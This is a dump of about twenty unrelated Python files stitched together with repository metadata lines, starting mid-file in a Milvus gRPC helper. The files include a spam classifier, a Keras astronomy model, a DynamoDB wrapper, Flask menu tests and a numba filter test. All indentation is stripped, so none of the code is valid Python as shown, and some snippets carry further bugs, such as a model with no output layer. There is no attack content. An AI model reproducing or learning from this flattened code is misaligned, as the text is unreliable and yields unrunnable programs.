@classmethod
def index_param(cls, table_name, index_type, params):
_param = grpc_types.IndexParam(status=status_pb2.Status(error_code=0, reason='Client'),
table_name=table_name,
index_type=index_type)
params = params or dict()
params_str = ujson.dumps(params)
_param.extra_params.add(key="params", value=params_str)
return _param
@classmethod
def search_param(cls, table_name, topk, query_records, partitions, params):
search_param = grpc_types.SearchParam(
table_name=table_name,
topk=topk,
partition_tag_array=partitions
)
for vector in query_records:
if isinstance(vector, bytes):
search_param.query_record_array.add(binary_data=vector)
else:
search_param.query_record_array.add(float_data=vector)
params = params or dict()
params_str = ujson.dumps(params)
search_param.extra_params.add(key="params", value=params_str)
return search_param
@classmethod
def search_by_id_param(cls, table_name, top_k, id_, partition_tag_array, params):
_param = grpc_types.SearchByIDParam(
table_name=table_name, id=id_, topk=top_k,
partition_tag_array=partition_tag_array
)
params = params or dict()
params_str = ujson.dumps(params)
_param.extra_params.add(key="params", value=params_str)
return _param
@classmethod
def search_vector_in_files_param(cls, table_name, query_records, topk, ids, params):
_search_param = Prepare.search_param(table_name, topk, query_records,
partitions=[], params=params)
return grpc_types.SearchInFilesParam(
file_id_array=ids,
search_param=_search_param
)
@classmethod
def cmd(cls, cmd):
return grpc_types.Command(cmd=cmd)
@classmethod
def delete_param(cls, table_name, start_date, end_date):
range_ = Prepare.range(start_date, end_date)
return grpc_types.DeleteByDateParam(range=range_, table_name=table_name)
@classmethod
def partition_param(cls, table_name, tag):
return grpc_types.PartitionParam(table_name=table_name, tag=tag)
@classmethod
def delete_by_id_param(cls, table_name, id_array):
return grpc_types.DeleteByIDParam(table_name=table_name, id_array=id_array)
@classmethod
def flush_param(cls, table_names):
return grpc_types.FlushParam(table_name_array=table_names)
@classmethod
def compact_param(cls, table_name):
return grpc_types.TableName(table_name=table_name)
| 4,802 |
src/api/__init__.py
|
ThaDeveloper/grind
| 1 |
2022896
|
from django.apps import AppConfig
class ApiAppConfig(AppConfig):
name = 'api'
label = 'api'
verbose_name = 'Api'
def ready(self):
import api.signals
# Django checksfor the `default_app_config` property of each registered app
# and use the correct app config based on that value.
default_app_config = 'api.ApiAppConfig'
| 347 |
src/main/PyCodes/spamClassification.py
|
panditu2015/Sentiment-Analysis
| 0 |
2023349
|
import re
import csv
import pprint
import nltk.classify
import pickle
import pandas as pd
from nltk.classify.scikitlearn import SklearnClassifier
from sklearn.linear_model import LogisticRegression,SGDClassifier
from sklearn.naive_bayes import MultinomialNB,BernoulliNB
from sklearn.svm import SVC, LinearSVC, NuSVC
#start replaceTwoOrMore
def replaceTwoOrMore(s):
#look for 2 or more repetitions of character
pattern = re.compile(r"(.)\1{1,}", re.DOTALL)
return pattern.sub(r"\1\1", s)
#end
#start process_tweet
def processTweet(tweet):
# process the tweets
#Convert to lower case
tweet = tweet.lower()
#Convert www.* or https?://* to URL
tweet = re.sub('((www\.[^\s]+)|(https?://[^\s]+))','URL',tweet)
#Convert @username to AT_USER
tweet = re.sub('@[^\s]+','AT_USER',tweet)
#Remove additional white spaces
tweet = re.sub('[\s]+', ' ', tweet)
#Replace #word with word
tweet = re.sub(r'#([^\s]+)', r'\1', tweet)
#trim
tweet = tweet.strip('\'"')
return tweet
#end
#start getStopWordList
def getStopWordList(stopWordListFileName):
#read the stopwords
stopWords = []
stopWords.append('AT_USER')
stopWords.append('URL')
fp = open(stopWordListFileName, 'r')
line = fp.readline()
while line:
word = line.strip()
stopWords.append(word)
line = fp.readline()
fp.close()
return stopWords
#end
#start getfeatureVector
def getFeatureVector(tweet, stopWords):
featureVector = []
words = tweet.split()
for w in words:
#replace two or more with two occurrences
w = replaceTwoOrMore(w)
#strip punctuation
w = w.strip('\'"?,.')
#check if it consists of only words
val = re.search(r"^[a-zA-Z][a-zA-Z0-9]*[a-zA-Z]+[a-zA-Z0-9]*$", w)
#ignore if it is a stopWord
if(w in stopWords or val is None):
continue
else:
featureVector.append(w.lower())
return featureVector
#end
#start extract_features
def extract_features(tweet):
tweet_words = set(tweet)
features = {}
for word in featureList:
features['contains(%s)' % word] = (word in tweet_words)
return features
#end
dircetory = "C:\\Users\\User\\Sentiment-Analysis\\src\\main\\"
#Read the tweets one by one and process it
inpTweets = csv.reader(open(dircetory + 'Resources\\sms_spam_train.csv', 'r', encoding = "cp850"))
# inpTweets = pd.read_csv("data/full_training_dataset.csv", encoding="")
print(inpTweets)
stopWords = getStopWordList(dircetory + 'Resources\\stopwords.txt')
count = 0
featureList = []
tweets = []
for row in inpTweets:
# print(row)
sentiment = row[0]
tweet = row[1]
processedTweet = processTweet(tweet)
featureVector = getFeatureVector(processedTweet, stopWords)
featureList.extend(featureVector)
tweets.append((featureVector, sentiment))
#end loop
# Remove featureList duplicates
featureList = list(set(featureList))
# print("featureList", featureList)
# Generate the training set
training_set = nltk.classify.util.apply_features(extract_features, tweets)
# print("training set", training_set)
print("Train the Naive Bayes classifier")
NBClassifier = nltk.NaiveBayesClassifier.train(training_set)
print("Trained NaiveBayes_Classifier")
filename = 'NaiveBayes_Classifier.sav'
pickle.dump(NBClassifier, open(dircetory + "Output\\Models\\Spam\\" + filename, 'wb'))
print("Training SVC_classifier")
SVC_classifier = SklearnClassifier(SVC())
SVC_classifier.train(training_set)
print("Trained SVC_classifier")
filename1 = 'SVC_classifier.sav'
pickle.dump(SVC_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename1, 'wb'))
# print("Train the Max Entropy classifier")
# MaxEntClassifier = nltk.classify.maxent.MaxentClassifier.train(training_set, 'GIS', trace=3, \
# encoding=None, labels=None, gaussian_prior_sigma=0, max_iter = 10)
# print("ME trained")
# filename2 = 'Max_Entropy_new.sav'
# pickle.dump(MaxEntClassifier, open(dircetory + "Output\\Models\\" + filename2, 'wb'))
print("Training Logisitic Regression")
LogisticRegression_classifier = SklearnClassifier(LogisticRegression())
LogisticRegression_classifier.train(training_set)
print("Trained Logisitic Regression")
filename3 = 'LogisticRegression_classifier.sav'
pickle.dump(LogisticRegression_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename3, 'wb'))
print("Training MNB_classifier")
MNB_classifier = SklearnClassifier(MultinomialNB())
MNB_classifier.train(training_set)
print("Trained MNB_classifier")
filename4 = 'MNB_classifier.sav'
pickle.dump(MNB_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename4, 'wb'))
print("Training SGDClassifier_classifier")
SGDClassifier_classifier = SklearnClassifier(SGDClassifier())
SGDClassifier_classifier.train(training_set)
print("Trained SGDClassifier_classifier")
filename5 = 'SGDClassifier_classifier.sav'
pickle.dump(SGDClassifier_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename5, 'wb'))
print("Training LinearSVC_classifier")
LinearSVC_classifier = SklearnClassifier(LinearSVC())
LinearSVC_classifier.train(training_set)
print("Trained LinearSVC_classifier")
filename6 = 'LinearSVC_classifier.sav'
pickle.dump(LinearSVC_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename6, 'wb'))
print("Training BernoulliNB_classifier")
BernoulliNB_classifier = SklearnClassifier(BernoulliNB())
BernoulliNB_classifier.train(training_set)
print("Trained BernoulliNB_classifier")
filename7 = 'BernoulliNB_classifier.sav'
pickle.dump(BernoulliNB_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename7, 'wb'))
| 5,686 |
aws_lambda_powertools/utilities/feature_flags/exceptions.py
|
nayaverdier/aws-lambda-powertools-python
| 1,208 |
2023364
|
class ConfigurationStoreError(Exception):
"""When a configuration store raises an exception on config retrieval or parsing"""
class SchemaValidationError(Exception):
"""When feature flag schema fails validation"""
class StoreClientError(Exception):
"""When a store raises an exception that should be propagated to the client to fix
For example, Access Denied errors when the client doesn't permissions to fetch config
"""
| 447 |
AstroMl/RRLyrae/Astro_Convolutional.py
|
vais-ral/CCPi-ML
| 0 |
2023326
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 24 10:12:03 2018
@author: zyv57124
"""
import matplotlib
matplotlib.use("Agg")
import numpy as np
import pandas
import sys
import matplotlib.pyplot as plt
import scipy.io as sio
import tensorflow as tf
import sklearn
from tensorflow import keras
from sklearn.model_selection import train_test_split
import math
from keras.models import Sequential
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.layers.core import Activation
from keras.layers.core import Flatten
from keras.layers.core import Dense
from keras import backend as K
from keras.layers.normalization import BatchNormalization
from keras.layers.core import Dropout
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.preprocessing.image import img_to_array
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
import numpy as np
import argparse
import random
import pickle
from time import time
class TimingCallback(keras.callbacks.Callback):
def __init__(self):
self.logs=[]
def on_epoch_begin(self, epoch, logs={}):
self.starttime=time()
def on_epoch_end(self, epoch, logs={}):
self.logs.append(time()-self.starttime)
#############Data Loading & Conversion######################
def predictionMap(xlim,ylim):
mesh = []
for x in np.arange(xlim[0],xlim[1],0.001):
for y in np.arange(ylim[0],ylim[1],0.001):
mesh.append([x,y])
return (np.array(mesh))
def reBalanceData(x,y):
filter1 = y==1
ones = x[np.where(y==1)].copy()
y_ones = y[np.where(y==1)].copy()
total = len(y)
total_one = len(ones)
multiplier = math.ceil(total/total_one)
for i in range(multiplier):
x = np.insert(x,1,ones,axis=0)
y = np.insert(y,1,y_ones,axis=0)
ran = np.arange(x.shape[0])
np.random.shuffle(ran)
x= x[ran]
y= y[ran]
return x,y
BS = 1000 #Set batch size
EPOCHS = 100 #Set epochs
INIT_LR = 0.003 #Set learning rate
IMAGE_DIMS = (20,20,1) #set image dimensions
num_classes = 1
Data_Astro = np.loadtxt('Data\AstroML_Data.txt',dtype=float)
Labels_Astro = np.loadtxt('Data\AstroML_Labels.txt',dtype=float)
Data_Astro = Data_Astro[:, [1, 0]]
print(Data_Astro.shape)
X_train, X_test,y_train, y_test = train_test_split(Data_Astro, Labels_Astro,test_size=0.2, shuffle=True)
print('X_train shape:', X_train.shape)
print(X_train.shape[0], 'train samples')
print(X_test.shape[0], 'test samples')
N_tot=len(y_train)
N_st = np.sum(Labels_Astro == 0)
N_rr = N_tot - N_st
N_plot = 5000 +N_rr
#Plot original data
fig = plt.figure(figsize=(5, 2.5))
fig.subplots_adjust(bottom=0.15, top=0.95, hspace=0.0, left=0.1, right=0.95, wspace=0.2)
ax = fig.add_subplot(1, 1, 1)
im=ax.scatter(Data_Astro[-N_plot:, 1], Data_Astro[-N_plot:, 0], c=Labels_Astro[-N_plot:], s=4, lw=0, cmap=plt.cm.binary, zorder=2)
im.set_clim(-0.5, 1)
plt.show()
N_tot=len(y_train)
N_st = np.sum(Labels_Astro == 0)
N_rr = N_tot - N_st
# partition the data into training and testing splits using 80% of
# the data for training and the remaining 20% for testing
#Weighting
filter1=y_train==0
y_train[filter1] = 0
filter1=y_train==1
y_train[filter1] = 1
X_train,y_train = reBalanceData(Data_Astro,Labels_Astro)
img_x, img_y = 20, 20
input_shapes = (20,20, 1)
# convert the data to the right type
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
#Build model
class_weight = {0:1.,1:((N_tot/N_rr)*1.2)}
class SmallerVGGNet:
def build(width, height, depth, classes):
model = Sequential()
model.add(Conv2D(32, (2, 2), padding="same", input_shape=input_shapes))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=1))
model.add(MaxPooling2D(pool_size=(3, 3)))
model.add(Dropout(0.25))
return model
model = SmallerVGGNet.build(width=IMAGE_DIMS[1], height=IMAGE_DIMS[0],depth=IMAGE_DIMS[2], classes='2')
model.compile(loss="binary_crossentropy", optimizer='adam', metrics=["accuracy"])
#
cb=TimingCallback()
history = model.fit(X_train, y_train, batch_size=BS,validation_data=(X_test, y_test),epochs=EPOCHS, verbose=1)
K.get_session().graph
## save the model to disk
#print("[INFO] serializing network...")
#model.save(args["model"])
#
## plot the training loss and accuracy
#plt.style.use("ggplot")
#plt.figure()
#N = EPOCHS
#plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
#plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
#plt.plot(np.arange(0, N), H.history["acc"], label="train_acc")
#plt.plot(np.arange(0, N), H.history["val_acc"], label="val_acc")
#plt.title("Training Loss and Accuracy")
#plt.xlabel("Epoch #")
#plt.ylabel("Loss/Accuracy")
#plt.legend(loc="upper left")
#plt.savefig(args["plot"])
#
#loss_data = (history.history['loss'])
#
#a = np.transpose(model.predict(X_test))
#
#
#xlim = (0.7, 1.35)
#ylim = (-0.15, 0.4)
#
#mesh = predictionMap(xlim,ylim) #makes mesh array
#xshape = int((xlim[1]-xlim[0])*1000)+1
#yshape = int((ylim[1]-ylim[0])*1000)
#predictions = model.predict(mesh[:,[1,0]]) #classifies points in the mesh 1 or 0
##%%
#fig = plt.figure(figsize=(5, 2.5))
#fig.subplots_adjust(bottom=0.15, top=0.95, hspace=0.0, left=0.1, right=0.95, wspace=0.2)
#ax = fig.add_subplot(1, 1, 1)
#im=ax.scatter(X_test[:, 1], X_test[:, 0], c=a[0], s=4, lw=0, cmap=plt.cm.binary, zorder=2)
#im.set_clim(-0.5, 1)
#ax.contour(np.reshape(mesh[:,0], (xshape, yshape)), np.reshape(mesh[:,1],(xshape,yshape)), np.reshape(predictions,(xshape,yshape)), cmap=plt.cm.binary,lw=2)
#plt.show()
| 5,739 |
nicaviz/python_utils.py
|
nicapotato/nicaviz
| 0 |
2023539
|
from contextlib import contextmanager
import time
@contextmanager
def timer(name):
"""
Time Each Process
"""
t0 = time.time()
yield
print('[{}] done in {} s'.format(name, round(time.time() - t0, 0)))
| 226 |
telehelp/__init__.py
|
Eliorco/TeleHelp
| 0 |
2023547
|
# url api
# https://api.telegram.org/bot<token>/METHOD_NAME
from flask import Flask
from telehelp.configuration import FLASK_SECRET_KEY, db_connection_string
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config.from_object(__name__)
app.secret_key = FLASK_SECRET_KEY
app.config['SQLALCHEMY_DATABASE_URI'] = f'sqlite:///{db_connection_string}'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
from telehelp import routes
| 467 |
imports.py
|
John-N-Carter/Viewer
| 1 |
2022799
|
#! python3
import sys, os, binascii
import random as r, math as m, copy as C
#
import glob, string, math, time, getopt, shutil, configparser
import subprocess as sub
#
import wx
import wx.lib.buttons as buttons
import imghdr
import constants as CONST
from operator import itemgetter, attrgetter
from concurrent import futures
if __name__ == '__main__':
print('Imports for Viewer')
| 412 |
smmap/scripts/correlation_strength_factor_tests.py
|
UM-ARM-Lab/mab_ms
| 3 |
2022729
|
#!/usr/bin/python
from run_trial import *
for correlation_strength_factor in [0.01, 0.1, 0.5, 0.9, 0.99]:
run_trial(
experiment="cloth_table",
start_bullet_viewer='true',
screenshots_enabled='true',
logging_enabled='true',
test_id='correlation_strength_factor_trials/KFMANDB_factor_' + str(correlation_strength_factor),
optimization_enabled='true',
bandit_algorithm='KFMANDB',
multi_model='true',
calculate_regret='true',
use_random_seed='false',
correlation_strength_factor=correlation_strength_factor)
for correlation_strength_factor in [0.01, 0.1, 0.5, 0.9, 0.99]:
run_trial(
experiment="rope_cylinder",
start_bullet_viewer='true',
screenshots_enabled='true',
logging_enabled='true',
test_id='correlation_strength_factor_trials/KFMANDB_factor_' + str(correlation_strength_factor),
optimization_enabled='true',
bandit_algorithm='KFMANDB',
multi_model='true',
calculate_regret='true',
use_random_seed='false',
correlation_strength_factor=correlation_strength_factor)
for correlation_strength_factor in [0.01, 0.1, 0.5, 0.9, 0.99]:
run_trial(
experiment="cloth_wafr",
start_bullet_viewer='true',
screenshots_enabled='true',
logging_enabled='true',
test_id='correlation_strength_factor_trials/KFMANDB_factor_' + str(correlation_strength_factor),
optimization_enabled='true',
bandit_algorithm='KFMANDB',
multi_model='true',
calculate_regret='true',
use_random_seed='false',
correlation_strength_factor=correlation_strength_factor)
| 1,709 |
examples/ctf_demo.py
|
enthought/ensemble
| 4 |
2023644
|
"""
This demonstrates the `CtfEditor` widget.
To use: right-click in the window to bring up a context menu. Once you've added
a color or opacity, you can drag them around by just clicking on them. The
colors at the end points are editable, but cannot be removed.
"""
from os.path import join
from traits.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
from enaml.qt.qt_application import QtApplication
from ensemble.ctf.api import CtfEditor, CtfManager, get_color
import traits_enaml
if __name__ == "__main__":
with traits_enaml.imports():
from ctf_demo_window import CtfDemoWindow
app = QtApplication()
ctf_editor = CtfEditor(prompt_color_selection=get_color)
ctf_manager = CtfManager.from_directory(
join(ETSConfig.application_data, 'CTF_demo')
)
win = CtfDemoWindow(ctf_editor=ctf_editor, ctf_manager=ctf_manager)
win.show()
app.start()
| 907 |
shop/migrations/0013_auto_20200827_1013.py
|
RitvikDayal/The-Stone-Shop
| 2 |
2023629
|
# Generated by Django 3.0.8 on 2020-08-27 04:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0012_auto_20200826_1307'),
]
operations = [
migrations.AddField(
model_name='customer',
name='email',
field=models.EmailField(default='<EMAIL>', max_length=100),
),
migrations.AddField(
model_name='customer',
name='fname',
field=models.CharField(default='Jhon', max_length=100),
),
migrations.AddField(
model_name='customer',
name='lname',
field=models.CharField(default='Doe', max_length=100),
),
]
| 740 |
command/randomcaptains.py
|
SodaCookie/RoleBot
| 1 |
2023758
|
import random
import helpers
async def randomcaptains(message, context):
"""Pick two random people from a specific voice channel to be captains."""
if not message.author.voice or not message.author.voice.channel:
helpers.send_message("You need to be part of a voice channel to use this command.")
return
channel = context.client.get_channel(message.author.voice.channel.id)
if len(channel.members) < 2:
helpers.send_message("This channel needs at least 2 people in it to pick captains.")
return
captains = random.sample(channel.members, 2)
helpers.send_message(message.channel, "Team 1's Captain: %s\nTeam 2's Captain: %s" % (helpers.get_member_name(captains[0]), helpers.get_member_name(captains[1])))
| 761 |
src/dymdao/dymdao.py
|
umaxyon/dymdao
| 0 |
2023283
|
import boto3
import inspect
class DymDao:
def __init__(self, *args, **kwargs):
self.db = boto3.resource('dynamodb', *args, **kwargs)
self.client = boto3.client('dynamodb', *args, **kwargs)
def table(self, table_name):
return WrapTable(self, table_name)
class WrapTable:
def __init__(self, dao, table_name):
self.dao = dao
self.table_name = table_name
self.table = self.dao.db.Table(table_name)
self.ddl = self.dao.client.describe_table(TableName=table_name)
self.key = self.__get_key_name()
self.__register_method()
def __register_method(self):
methods = inspect.getmembers(self.table, inspect.ismethod)
for name, func in methods:
setattr(self, name, self.__intercept(func))
def __get_key_name(self):
key_schema = self.ddl['Table']['KeySchema']
hash_name = next((r['AttributeName'] for r in key_schema if r['KeyType'] == "HASH"), None)
range_name = next((r['AttributeName'] for r in key_schema if r['KeyType'] == "RANGE"), None)
return hash_name, range_name
@staticmethod
def __intercept(method):
def _m(*args, **kwargs):
ret = method(*args, **kwargs)
return WrapTable.pick_out_item(ret)
return _m
@staticmethod
def pick_out_item(obj):
if type(obj) == dict:
if 'Item' in obj:
return obj['Item']
if 'Items' in obj:
items = []
for row in obj['Items']:
items.append(row['Item'] if type(row) == dict and 'Item' in row else row)
return items
return obj
def find(self, hash_value, range_value=None, asc=True, option=None):
hash_name, range_name = self.key
opt = option if option is not None else {}
if range_value is not None:
key_param = {hash_name: hash_value, range_name: range_value}
ret = self.table.get_item(Key=key_param, **opt)
ret = self.pick_out_item(ret)
return [ret] if ret is not None else []
else:
query_params = {
"TableName": self.table_name,
"KeyConditionExpression": "#a = :val",
"ExpressionAttributeValues": {":val": hash_value},
"ExpressionAttributeNames": {"#a": hash_name},
"ScanIndexForward": asc,
}
query_params.update(opt)
ret = self.table.query(**query_params)
return self.pick_out_item(ret)
| 2,584 |
tools/jisx0208.py
|
tatnish/SDFont
| 0 |
2023486
|
#!/usr/bin/env python3
# coding: utf-8
#
# This script outputs set of characters used by font_to_py.py
# Usage:
# python3 jisx0208.py > chars.txt
# python3 font_to_py.py -k chars.txt <input ttf font name> <output.py>
#
# Go visit: https://github.com/tatnish/micropython-font-to-py
# for more detail converter info.
#
# Note: JIS0208.TXT is available at:
# http://unicode.org/Public/MAPPINGS/OBSOLETE/EASTASIA/JIS/JIS0208.TXT
jisx0208=[]
unicode=[]
with open("JIS0208.TXT", "r") as f:
for line in f:
if (not line[0] == "#"):
_, jis, uni, __ = line.strip().split("\t")
jisx0208.append(int(jis,16))
unicode.append(int(uni,16))
# ASCII
for i in range(0x20,0x7F):
print(chr(i),end="")
# Half-width kana
for i in range(0xFF61,0xFF9D):
print(chr(i),end="")
# JIS X 0208
for i in jisx0208:
print(chr(unicode[jisx0208.index(i)]), end="")
| 897 |
autotabular/pipeline/components/data_preprocessing/categorical_encoding/one_hot_encoding.py
|
jianzhnie/AutoTabular
| 48 |
2022629
|
from typing import Dict, Optional, Tuple, Union
import numpy as np
import scipy.sparse
from autotabular.pipeline.base import DATASET_PROPERTIES_TYPE, PIPELINE_DATA_DTYPE
from autotabular.pipeline.components.base import AutotabularPreprocessingAlgorithm
from autotabular.pipeline.constants import DENSE, INPUT, SPARSE, UNSIGNED_DATA
from autotabular.pipeline.implementations.SparseOneHotEncoder import SparseOneHotEncoder
from ConfigSpace.configuration_space import ConfigurationSpace
from sklearn.preprocessing import OneHotEncoder as DenseOneHotEncoder
class OneHotEncoder(AutotabularPreprocessingAlgorithm):
def __init__(self, random_state: Optional[np.random.RandomState] = None):
self.random_state = random_state
def fit(self,
X: PIPELINE_DATA_DTYPE,
y: Optional[PIPELINE_DATA_DTYPE] = None) -> 'OneHotEncoder':
if scipy.sparse.issparse(X):
self.preprocessor = SparseOneHotEncoder()
else:
self.preprocessor = DenseOneHotEncoder(
sparse=False, categories='auto', handle_unknown='ignore')
self.preprocessor.fit(X, y)
return self
def transform(self, X: PIPELINE_DATA_DTYPE) -> PIPELINE_DATA_DTYPE:
if self.preprocessor is None:
raise NotImplementedError()
return self.preprocessor.transform(X)
@staticmethod
def get_properties(
dataset_properties: Optional[DATASET_PROPERTIES_TYPE] = None
) -> Dict[str, Optional[Union[str, int, bool, Tuple]]]:
return {
'shortname': '1Hot',
'name': 'One Hot Encoder',
'handles_regression': True,
'handles_classification': True,
'handles_multiclass': True,
'handles_multilabel': True,
'handles_multioutput': True,
# TODO find out of this is right!
'handles_sparse': True,
'handles_dense': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (INPUT, ),
}
@staticmethod
def get_hyperparameter_search_space(
dataset_properties: Optional[DATASET_PROPERTIES_TYPE] = None
) -> ConfigurationSpace:
return ConfigurationSpace()
| 2,218 |
src/dbcontroller/manager/utils/object_id.py
|
hlop3z/dbcontroller
| 0 |
2022734
|
"""
* Database Specific (Decode)
"""
try:
from bson.objectid import ObjectId
except ImportError:
ObjectId = None
from .ids import ID
def sql_id_decode(unique_id) -> int | None:
"""Decoder for SQL"""
try:
return_value = int(ID.decode(unique_id))
except Exception:
return_value = None
return return_value
def mongo_id_decode(unique_id) -> str | None:
"""Decoder for Mongo"""
try:
return_value = ObjectId(ID.decode(unique_id))
except Exception:
return_value = None
return return_value
| 564 |
telesurvideos/settings_es.py
|
dreglad/telesurvideos
| 0 |
2022697
|
# -*- coding: utf-8 -*- #
"""
telesurvideos Spanish site settings
"""
from __future__ import unicode_literals
from settings import *
SITE_ID = 1
LANGUAGE_CODE = 'es'
LANGUAGES = (
('es', gettext('es')),
)
CACHES['default']['KEY_PREFIX'] = 'es'
CELERY_BROKER_URL = 'redis://localhost:6379/0'
VIDEOS_EXCLUDE_CATEGORIAS = (
'con-nombre-de-mujer', 'zona-verde', 'al-pulso-de-venezuela',
'al-pulso-de-ecuador', 'a-nivel-del-sur',
)
VIDEOS_EXCLUDE_TIPOS = ('tematico',)
VIDEOS_EXCLUDE_TEMAS = ()
VIDEOS_EXCLUDE_CATEGORIAS = ()
VIDEOS_EXCLUDE_CORRESPONSALES = ()
VIDEOS_EXCLUDE_PAISES = ()
VIDEOS_EXCLUDE_SERIES = ()
try:
from local_settings import *
except ImportError:
pass
try:
from local_settings_es import *
except ImportError:
pass
| 768 |
app/__init__.py
|
sqoor/SeqGenSQL-ui
| 0 |
2023442
|
from flask import Flask
# from flask_sqlalchemy import SQLAlchemy
# from flask_migrate import Migrate
from config import Config
app = Flask(__name__)
app.config.from_object(Config)
# db = SQLAlchemy(app)
# migrate = Migrate(app, db)
from app import routes, models
| 266 |
tests/v2/test_menus.py
|
fabischolasi/fast-food-fast-v1
| 1 |
2023572
|
"""
This module facilitates testing
"""
import unittest
import os
import sys
import json
from tests.v2.base_setup import BaseTests
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
class MenuTests(BaseTests):
"""
This class contains tests for menu
"""
def test_get_all_menu(self):
"""
This method tests if an admin successfully gets all menu
"""
response = self.client().get('api/v2/menu')
self.assertEqual(response.status_code, 200)
def test_get_a_particular_menu(self):
"""
This method tests if an admin successfully gets a particular menu
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().get('api/v2/menu/1')
self.assertEqual(response.status_code, 200)
def test_get_a_particular_menu_that_doesnt_exist(self):
"""
This method tests if an admin successfully gets a particular menu
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().get('api/v2/menu/2')
self.assertEqual(response.status_code, 200)
def test_admin_create_menu(self):
"""
This method tests a successful creation of menu
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
def test_admin_create_menu_that_already_exist(self):
"""
This method tests a successful creation of menu
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
result = json.loads(response.data.decode('utf-8'))
self.assertEqual(result.get('message'), 'meal already in menu')
def test_admin_delete_a_particular_menu(self):
"""
This method tests successful deletion of a particular menu
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().delete('/api/v2/menu/1', headers=headers, content_type='application/json')
self.assertEqual(response.status_code, 200)
def test_admin_delete_a_particular_menu_that_doesnt_exist(self):
"""
This method tests successful deletion of a particular menu
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().delete('/api/v2/menu/4', headers=headers, content_type='application/json')
self.assertEqual(response.status_code, 404)
if __name__ == '__main__':
unittest.main()
| 5,851 |
numba/tests/test_filter2d.py
|
aseyboldt/numba
| 1 |
2022975
|
#! /usr/bin/env python
# ______________________________________________________________________
'''test_filter2d
Test the filter2d() example from the PyCon'12 slide deck.
'''
# ______________________________________________________________________
import numpy
from numba import *
from numba.decorators import jit
import sys
import unittest
# ______________________________________________________________________
def filter2d(image, filt):
M, N = image.shape
Mf, Nf = filt.shape
Mf2 = Mf // 2
Nf2 = Nf // 2
result = numpy.zeros_like(image)
for i in range(Mf2, M - Mf2):
for j in range(Nf2, N - Nf2):
num = 0.0
for ii in range(Mf):
for jj in range(Nf):
num += (filt[Mf-1-ii, Nf-1-jj] * image[i-Mf2+ii, j-Nf2+jj])
result[i, j] = num
return result
# ______________________________________________________________________
class TestFilter2d(unittest.TestCase):
def test_vectorized_filter2d(self):
ufilter2d = jit(argtypes=[double[:,:], double[:,:]],
restype=double[:,:])(filter2d)
image = numpy.random.random((50, 50))
filt = numpy.random.random((5, 5))
filt /= filt.sum()
plain_old_result = filter2d(image, filt)
hot_new_result = ufilter2d(image, filt)
self.assertTrue((abs(plain_old_result - hot_new_result) < 1e-9).all())
# ______________________________________________________________________
if __name__ == "__main__":
TestFilter2d('test_vectorized_filter2d').debug()
